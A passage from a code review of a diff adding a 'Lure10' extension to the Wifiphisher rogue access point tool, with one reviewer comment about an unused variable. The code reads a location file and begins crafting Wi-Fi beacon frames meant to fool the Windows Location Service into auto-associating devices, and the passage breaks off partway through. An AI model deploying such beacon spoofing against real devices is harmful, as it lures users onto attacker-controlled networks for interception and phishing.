wifiphisher/extensions/lure10.py

```diff
@@ -0,0 +1,104 @@
+"""
+Extension that implements the Lure10 attack.
+
+Exploits the Wi-Fi Sense feature and will result
+to automatic association by fooling the Windows
+Location Service
+"""
+
+import struct
+import wifiphisher.common.constants as constants
+import scapy.layers.dot11 as dot11
+
+
+class Lure10(object):
+    """
+    Sends a number of beacons to fool Windows Location Service.
+    """
+
+    def __init__(self, shared_data):
+        """
+        Setup the class with all the given arguments.
+
+        :param self: A Lure10 object.
+        :param data: Shared data from main engine
+        :type self: Deauthentication
+        :type data: dictionary
+        :return: None
+        :rtype: None
+        """
+
+        self.first = True
+        self.first_output = True
+        self.data = shared_data
+        self.beacons_num = 0
+
+    def get_packet(self, pkt):
+        """
+        We start broadcasting the beacons on the first received packet.
+
+        :param self: A Lure10 object.
+        :param packet: A scapy.layers.RadioTap object.
+        :type self: Lure10
+        :type packet: scapy.layers.RadioTap
+        :return: list with the crafted beacon frames
+        :rtype: list
+        """
+
+        beacons = []
+
+        if self.first:
+            if self.data.args.lure10_exploit:
+                area_file = constants.LOCS_DIR + self.data.args.lure10_exploit
+                with open(area_file) as a_file:
+                    wlans = [x.strip() for x in a_file.readlines()]
+                    for wlan in wlans:
+                        bssid, essid = wlan.split(' ', 1)
```

Comment:
`bssid` is never used and it could be replaced by `_` since we don't care about it.